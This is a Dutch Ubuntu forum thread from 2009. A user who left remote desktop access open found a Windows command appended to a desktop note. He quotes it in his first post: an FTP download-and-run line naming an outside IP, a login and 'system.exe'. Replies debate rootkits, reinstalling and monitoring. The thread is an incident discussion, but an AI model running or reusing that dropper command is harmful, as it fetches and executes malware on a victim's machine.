Nieuws:

Welkom, Gast. Alsjeblieft inloggen of registreren.
Heb je de activerings-mail niet ontvangen?

Auteur Topic: echo You got owned  (gelezen 10147 keer)

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
echo You got owned
« Gepost op: 2009/07/15, 23:16:40 »
Hallo, gisteren gebeurde er iets grappigs met m'n Ubu Jaunty. Heb net de huiskamer-pc van 8.04 geüpdated (correct woord volgens Het Groene Boekje...) naar 9.04 Jaunty. Een scriptje dat ik op een andere pc draai om foto's op beide pc's te synchroniseren, wou echter niet werken: connection refused. Normaal, daar Ubuntu standaard goed zit dichtgetimmerd. Dus ik probeer het een en ander bij Beheer, connectievenster of zoiets (heb even de juiste Nederlandse benaming niet bij de hand) en vink wat dingen aan, zoals Toegang op afstand etc. Wou nog niet werken, dus ik dacht, daar kijk ik later nog wel eens naar, ik weet dat het eenvoudig is om die toegang op afstand te activeren, ik doe dat al jaren. Ik zet de pc in slaapstand.

Een paar uur later het ding weer aangezet. En?

Op het bureaublad opent opeens gedit met een klein bestandje dat daar al stond, een aantekening hoe je het afspelen van mp3's in Amarok in Jaunty moet activeren. Maar er was tekst aan toegevoegd, zie hier:

"installeren om mp3s te horen:
(sudo) libxine1-ffmpegcmd /c echo open 208.248.82.3 21 >> ik &echo user hycsju hyc7186 >> ik &echo binary >> ik &echo get system.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system.exe &exit
echo You got owned"

Tot die /c is mijn tekst, de rest komt van elders/buiten! Krijgen we nou dan, dacht ik. Een zoektocht op internet naar "echo You got owned" informeert me dat enkele andere Ubuntu-gebruikers hier onlangs ook mee te maken hebben gehad, en ook Mac-gebruikers. Schijnt niet erg te zijn (mogelijk is dat anders op Windows...). In de tijd dat de pc uitstond/sliep, heb ik geen 'dubieuze' sites bezocht.

Vraag is dus hoe die tekst op mijn pc is gekomen. Duidelijk omdat ik teveel open heb gezet en er kennelijk bots/scripts/etc. zijn die permanent poorten scannen, op zoek naar fijne beschikbare services. Maar de in het script genoemde site, die volgens sommigen in Duitsland resideert, heb ik zeker niet bezocht.

Ergo, pas op met het openen van poorten/services, ook (juist!) al is het maar voor een uurtje...

Om hier nog een vraag aan te hangen: Jaunty zegt als ik Applicaties - Internet - Terminal Server Client aanklik om de desktop van mijn andere pc (8.04) te zien, zoiets als: vncviewer staat niet in uw pad, check installatie, verbinding mislukt. Staat wel in het menu en niet in een/mijn pad? Hoe ken dat?

Groet, Paul.
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Offline Johan van Dijk

  • Administrator
    • johanvandijk
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #1 Gepost op: 2009/07/15, 23:25:20 »
Ubuntu staat standaard goed dicht, maar je hebt zelf de bureaublad op afstand-functie aangezet, en iedereen toegang gegeven zonder dat daarvoor een wachtwoord nodig is. Vervolgens komt er een bot langs die allerlei computers scant op die service en probeert in te loggen....

Ik zou dat systeem nu niet meer vertrouwen. Misschien dat die bot op de achtergrond wel meer dingen aangepast heeft die jij nog niet gezien hebt? Formatteren en een verse installatie dus.

En je 2e vraag: ik zou de Remote Desktop Viewer gebruiken ipv de Terminal Server Client. Die doet standaard wel VNC.
Maar goed, dat kan je pas proberen na een verse installatie.

Offline jeroenl

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #2 Gepost op: 2009/07/15, 23:28:56 »
Is een windows virus overduidelijk :') maar als ik hier die functie aanzet staat er dat ik eerst andere moet "accepteren" alvorens mee te kijken.

Online Pjotr

  • Lid
    • http://sites.google.com/site/computertip
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #3 Gepost op: 2009/07/15, 23:35:01 »
Ik zou dat systeem nu niet meer vertrouwen. Misschien dat die bot op de achtergrond wel meer dingen aangepast heeft die jij nog niet gezien hebt? Formatteren en een verse installatie dus.

+1

Wel lachen, trouwens.  :-)

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #4 Gepost op: 2009/07/15, 23:39:43 »
Ik zou dat systeem nu niet meer vertrouwen. Misschien dat die bot op de achtergrond wel meer dingen aangepast heeft die jij nog niet gezien hebt? Formatteren en een verse installatie dus.
Hallo, het betreft een huiskamer-pc zonder belangrijke documenten of bankinloggegevens. Daar ik nieuwsgierig van aard ben, ga ik niet formatteren maar kijken wat er eventueel nog meer gebeurt (ik ben dol op rare exe-bestanden!). De boel staat inmiddels weer standaard dicht.

En je 2e vraag: ik zou de Remote Desktop Viewer gebruiken ipv de Terminal Server Client. Die doet standaard wel VNC.
Wat is er dan mis met TSC? Ik gebruik dat al langere tijd/paar jaar om even op een andere desktop in te loggen.
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Offline dellkubuntu

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #5 Gepost op: 2009/07/15, 23:41:19 »
Ik snap alleen niet dat als je computer op afstand besturen al jaren gebruikt,zoals je zegt,dat je dan de toegang open zet voor de hele wereld?Anders kan ik het niet verklaren dat dat script is aangepast,dan had er wel een waarschuwing opgestaan in de lijn van 'wilt u die of die toegang verlenen ja/nee'.

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #6 Gepost op: 2009/07/15, 23:45:40 »
Nee, open voor de hele wereld was alleen tijdelijk, een uurtje, toen ik probeerde m'n nieuwe Jaunty vanaf m'n bestaande 8.04 te benaderen en andersom, niet jaren lang, 'k ben nie gek hé! :-)
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Offline Johan van Dijk

  • Administrator
    • johanvandijk
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #7 Gepost op: 2009/07/15, 23:46:43 »
Ik zou dat systeem nu niet meer vertrouwen. Misschien dat die bot op de achtergrond wel meer dingen aangepast heeft die jij nog niet gezien hebt? Formatteren en een verse installatie dus.
Hallo, het betreft een huiskamer-pc zonder belangrijke documenten of bankinloggegevens. Daar ik nieuwsgierig van aard ben, ga ik niet formatteren maar kijken wat er eventueel nog meer gebeurt (ik ben dol op rare exe-bestanden!). De boel staat inmiddels weer standaard dicht.
Je weet dus zeker dat er geen proces draait om al je wachtwoorden te stelen? Of een mailer die mij en andere internetters bestookt met spam?  :'(
Hoe zeker ben je van je zaak? Heb je alle systeembestanden gecontroleerd via een live cd, plus de m5sum hashes van de pakketten zoals die op internet te vinden zijn? Heb je gekeken naar welke processen er allemaal draaien? Enzovoort. Zo makkelijk is het niet om duidelijk te krijgen of je systeem nog gezond is...

Wie weet heb je nu wel een mooie rootkit, die zich nu verborgen houdt voor je en op de achtergrond andere mensen aan het lastigvallen is met spam, virussen of andere rotzooi. Ik vind het verder prima dat jij er geen last van hebt, maar zou je wel sociaal willen zijn naar de andere internetters op deze wereld en alles even goed uitzoeken?

Citaat
En je 2e vraag: ik zou de Remote Desktop Viewer gebruiken ipv de Terminal Server Client. Die doet standaard wel VNC.
Wat is er dan mis met TSC? Ik gebruik dat al langere tijd/paar jaar om even op een andere desktop in te loggen.
De remote desktop viewer doet aan Avahi, dus je ziet automagisch alle andere computers in je eigen netwerk. Je kan ook de resolutie veranderen, als je bijvoorbeeld op een kleinere of grotere monitor werkt. Je hoeft ook geen extra pakketten te installeren.

Met TSC zal het allemaal ook wel kunnen, maar dan zal je extra pakketten moeten installeren. Dubbel werk en minder handig lijkt me. :)

Offline jeroenl

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #8 Gepost op: 2009/07/15, 23:58:46 »
Johan, Ik durf het bijna niet te zeggen maar ik surf met mijn xp werk laptop zonder firewall aan en zonder virus scan ;) ( wel met alle update's)

Offline dellkubuntu

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #9 Gepost op: 2009/07/16, 00:00:18 »
Nee, open voor de hele wereld was alleen tijdelijk, een uurtje, toen ik probeerde m'n nieuwe Jaunty vanaf m'n bestaande 8.04 te benaderen en andersom, niet jaren lang, 'k ben nie gek hé! :-)
Ik zou het zelfs niet voor een uur durven  :D

Offline Johan van Dijk

  • Administrator
    • johanvandijk
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #10 Gepost op: 2009/07/16, 00:04:20 »
Johan, Ik durf het bijna niet te zeggen maar ik surf met mijn xp werk laptop zonder firewall aan en zonder virus scan ;) ( wel met alle update's)
:'(

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #11 Gepost op: 2009/07/16, 00:04:41 »
Je weet dus zeker dat er geen proces draait om al je wachtwoorden te stelen? Of een mailer die mij en andere internetters bestookt met spam?  :'(
Hoe zeker ben je van je zaak? Heb je alle systeembestanden gecontroleerd via een live cd, plus de m5sum hashes van de pakketten zoals die op internet te vinden zijn? Heb je gekeken naar welke processen er allemaal draaien? Enzovoort. Zo makkelijk is het niet om duidelijk te krijgen of je systeem nog gezond is...
Nee zeg ben je gek, ik ben niet gek! :-) Rkhunter geeft niets ernstigs retour, ps -ax geeft zo te zien geen vreemde processen, top en htop idem.

Wie weet heb je nu wel een mooie rootkit, die zich nu verborgen houdt voor je en op de achtergrond andere mensen aan het lastigvallen is met spam, virussen of andere rotzooi. Ik vind het verder prima dat jij er geen last van hebt, maar zou je wel sociaal willen zijn naar de andere internetters op deze wereld en alles even goed uitzoeken?
Nee. Ben erg benieuwd of dit scriptje, dat meerdere malen op diverse fora als een uit de hand gelopen kiddy-grap wordt beschreven, dingen uithaalt op mijn Linux/Ubuntu. Zeker kun je nooit zijn als het om beveiliging gaat, maar het kan geen kwaad om dit ding eens een poosje te laten draaien -- ALS het al draait! Dat heeft weinig met sociaal zijn te maken. Moet ik het alle Windows-gebruikers die mij ongeweten viagra-spam sturen kwalijk nemen dat zij onvoldoende op de hoogte zijn van wat er eventueel met hun pc's aan de hand is? Nee toch...

De remote desktop viewer doet aan Avahi, dus je ziet automagisch alle andere computers in je eigen netwerk. Je kan ook de resolutie veranderen, als je bijvoorbeeld op een kleinere of grotere monitor werkt. Je hoeft ook geen extra pakketten te installeren.

Met TSC zal het allemaal ook wel kunnen, maar dan zal je extra pakketten moeten installeren. Dubbel werk en minder handig lijkt me. :)
Mogelijk, heb net openssh-server en ssh geïnstalleerd, volgens mij was dat wat me ontbrak, morgen even proberen, ben nu te lui!

Groet, Paul.
« Laatst bewerkt op: 2009/07/16, 00:07:06 door Paul Matthijsse »
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Online Pjotr

  • Lid
    • http://sites.google.com/site/computertip
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #12 Gepost op: 2009/07/16, 00:05:42 »
Nee, open voor de hele wereld was alleen tijdelijk, een uurtje, toen ik probeerde m'n nieuwe Jaunty vanaf m'n bestaande 8.04 te benaderen en andersom, niet jaren lang, 'k ben nie gek hé! :-)
Ik zou het zelfs niet voor een uur durven  :D

En ik nog geen seconde. Dichtspijkeren die zooi, vanaf het eerste ogenblik. Veiligheid voor alles.

Offline Johan van Dijk

  • Administrator
    • johanvandijk
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #13 Gepost op: 2009/07/16, 00:10:18 »
Nee zeg ben je gek, ik ben niet gek! :-) Rkhunter geeft niets ernstigs retour, ps -ax geeft zo te zien geen vreemde processen, top en htop idem.
En als er een rootkit op je systeem staat, die de executables aangepast heeft? Dan gebruik je een versie van ps/top die de verdachte processen niet laat zien. Of de kernel is zo aangepast dat veel programma's de bestanden niet kunnen zien. Dan is rkhunter ook niet echt nuttig ;)

Online Pjotr

  • Lid
    • http://sites.google.com/site/computertip
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #14 Gepost op: 2009/07/16, 00:18:08 »
@Johan: Of Paul wil formatteren en opnieuw installeren, dat mag hij helemaal zelf weten. De kans op een verziekt systeem is natuurlijk wel een stuk kleiner dan bij een Windowsbak. Paul is nog geen onverantwoordelijk iemand, wanneer hij de zaak niet formatteert.

Wat ik zelf in Pauls plaats zou doen, is duidelijk: ik zou er nog geen drie seconden over hoeven na te denken. Formatteren die hap en opnieuw installeren. Maar dat is slechts mijn aanpak, en niet meer dan dat.

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #15 Gepost op: 2009/07/16, 00:21:34 »
Daar heb je gelijk in! Als, als en als... De juiste security-attitude is zeer beslist die van de compleet paranoïde it'er. Maar daar kunnen we op voortborduren. Mogelijk heeft deze rootkit/kiddy-script ook het formatteringsprogramma van Ubuntu gewijzigd, waardoor formatteren ook niets meer uithaalt/oplost. En wordt elke nieuwe kernel vanaf een ander adres binnengehaald, incluis dit foute script dat jou en iedereen blijft spammen. Dat is en blijft allemaal mogelijk.

Nooit is me dit overkomen met een Linux-pc (jaar of vijf). Dat wekt mijn nieuwsgierigheid des te meer. Zeer benieuwd wat nog komen gaat of niet. Formatteren is er voorlopig dus niet bij helaas.
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Offline Johan van Dijk

  • Administrator
    • johanvandijk
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #16 Gepost op: 2009/07/16, 00:34:00 »
Dat klopt wel Pjotr, maar ik vind ook dat je een verantwoordelijkheid hebt naar je medegebruikers.
Ik kan ontzettend sacherijnig worden als ik kijk naar alle spam en rotzooi waar zoveel mensen last van hebben. En dan te bedenken dat dat gedaan wordt door computers van mensen die te lam zijn om de beveiliging een beetje op orde te houden. Of dat komt door onkunde, desinteresse of een foutje dat maakt niet eens zoveel uit, het blijft gewoon vervelend.
Voor het slachtoffer is het natuurlijk ook vervelend. Ik zit ook niet te wachten op een format en al het werk dat daarbij komt kijken. Dus ik begrijp ook wel dat je dat liever niet doet :)

@Paul: Formatteren moet je dan ook doen vanuit een live cd ;)

Offline dellkubuntu

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #17 Gepost op: 2009/07/16, 00:38:22 »
Ik zou het hele zaakje formateren met gparted live cd en dan een schone install doen.Ik weet niet of je nog externe schijven of geheugensticks gebruikt,maar die kun je dus ook besmetten.

Offline jeroenl

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #18 Gepost op: 2009/07/16, 00:38:42 »
Trouwens johan om je gerust te stellen ik scan me XP cd wel regelmatig met een cd ;)

Maar om toch even in te haken op het onderwerp, een jaartje geleden een windows xp instal gedaan, waar ik alleen een oude windows cd had ( sp1 ) ding geïnstalleerd en aan internet gehangen voor de update's. Binnen een uur stonden er 4 virussen/malware/whatever op ( virus scan was nog niet geïnstalleerd  ) Dus de kans dat er iets binnen een uur op een pc staat is in mijn ogen 100% Als deze niet goed beveiligd is.

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #19 Gepost op: 2009/07/16, 00:50:17 »
Johan, ik kan het echt niet met je eens worden vanavond! Mensen die "te lam" zijn om hun systeem op orde te houden? Daar moet je jaren IT voor hebben gestudeerd om te kunnen beweren dat je systeem op orde is! Hoe moeten al die mensen die een simpele Windows-pc in de supermarkt hebben gekocht en die werkelijk zeer andere interesses hebben dan hun systeem te beveiligen, al die security-trucs in de vingers krijgen? Die willen alleen maar surfen en mailen! Dit is op geen enkele manier negatief bedoeld, ik heb het hier over gewone mensen, zoals muzikanten, fotografen, rijschoolinstructeurs, zwemleraressen, etc., etc.

En hoe weet jij zeker ("zeker" staat daar) dat er met jouw systeem niets aan de hand is? Het goede antwoord is: dat weten we nooit en te nimmer. Altijd zullen er mensen zijn die dingen weten te omzeilen, dat is nu eenmaal een law of life.

En hoe word je zo chagrijnig van alle spam en rotzooi op Ubuntu? Spamassassin blokkeert in de orde van 98,9 procent (na m'n laatste vakantie nog eens vastgesteld/uitgerekend) van alle spam. En wat is die andere rotzooi?

Tot slot, als vrolijke uitsmijter. Vertel mij eens hoe ik ZEKER kan weten dat de live-cd die ik zojuist gedownload heb, geen gehackte en verscripte versie is? Antwoord: dat kan ik niet of nauwelijks vaststellen. Ergo, een goed deel van het leven draait gewoon op wederzijds vertrouwen. Soms gaat dat mis, heel vaak echter niet...

Groet, Paul.
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Offline Gandyman

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #20 Gepost op: 2009/07/16, 00:50:22 »
Op zich kan formateren geen kwaad, echter ik zou ook ff blijven monitoren wat er op me systeem gebeurd.

Is het een simpel script blijf dan je logs uitlezen die in de /var staan.
Je ziet snel genoeg of je ineens een spammailer bent geworden.

Alhoewel ik er redelijk van overtuigd ben dat het een windows worm is die weinig tot nix doet op een Linux bak.

Heb ik gelijk als ik zeg dat je internet hebt via een kabel-boer ?

Dus geen ADSL via een provider ?
I don't suffer from insanity, I enjoy every minute of it.
Microsoft geeft je een raam, Linux geeft je een heel huis :D

Offline Gandyman

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #21 Gepost op: 2009/07/16, 00:55:07 »

En hoe weet jij zeker ("zeker" staat daar) dat er met jouw systeem niets aan de hand is? Het goede antwoord is: dat weten we nooit en te nimmer. Altijd zullen er mensen zijn die dingen weten te omzeilen, dat is nu eenmaal een law of life.

Groet, Paul.

Hier boor je een waar feit aan !

Ik heb gehackte servers meegemaakt waar geen spoor van de hacker achter was gebleven en waar het heel erg laat bij ontdekt was.
Ze/hij/zij had het zeer netjes en goed gedaan, er bleef geen log achter en de server deed toch dingen die het niet moest/mocht doen.

Uiteraard is die helemaal opnieuw opgezet middels een mirror, maar het heeft heel wat kopzorgen gekost om erachter te komen.

Kijk wat een script-kiddy uithaalt is door een gemiddelde ervaren Linux gebruiker snel te merken, die zijn slordig en werken grof.
Maar de pro's kunnen dingen die je niet gelooft.
I don't suffer from insanity, I enjoy every minute of it.
Microsoft geeft je een raam, Linux geeft je een heel huis :D

Offline Paul Matthijsse

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #22 Gepost op: 2009/07/16, 00:56:10 »
Nee, geen kabel hier,wel adsl
denk ook dat dat script op (of via) een linux-doos weinig uit kan richten, dit is mede gebaseerd op analyses van andere min of meer geïnformeerde Ubu/Mac-gebruikers.
https://allesgimpofbijna.wordpress.com - GIMP en omstreken
https://paulsphotopalace.wordpress.com (Engelstalig) - Raw, RawTherapee, G'MIC, GIMP...

Offline jeroenl

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #23 Gepost op: 2009/07/16, 00:56:34 »
gandyman, wat is dan volgens jou het verschil in een kabel netwerk vs adsl?

Offline Gandyman

  • Lid
  • Steunpunt: Nee
Re: echo You got owned
« Reactie #24 Gepost op: 2009/07/16, 01:00:57 »
De IP reeksen van kabelaars zijn bekender en liggen continu onder vuur van hackers en script-kiddys

Gewone providers hebben ook hun netwerk wat beter op orde en de gebruikers hebben meestal niet allemaal dezelfde modem als die van kabelaars.
Omdat die modems bekend zijn bij hackers weten ze ook de zwakke plekken en richten hun scripts daarop.

Dit is ook de reden waarom van die mensen (met windows) de PC's het snelst geinfecteerd raken met allerhande zooi.
En omdat het bij Paul Matthijsse al binnen een uurtje bekeken was vermoeden ik dat hij bij een kabelaar zat.

@Paul Matthijsse
Bij welke provider zit je ?
I don't suffer from insanity, I enjoy every minute of it.
Microsoft geeft je een raam, Linux geeft je een heel huis :D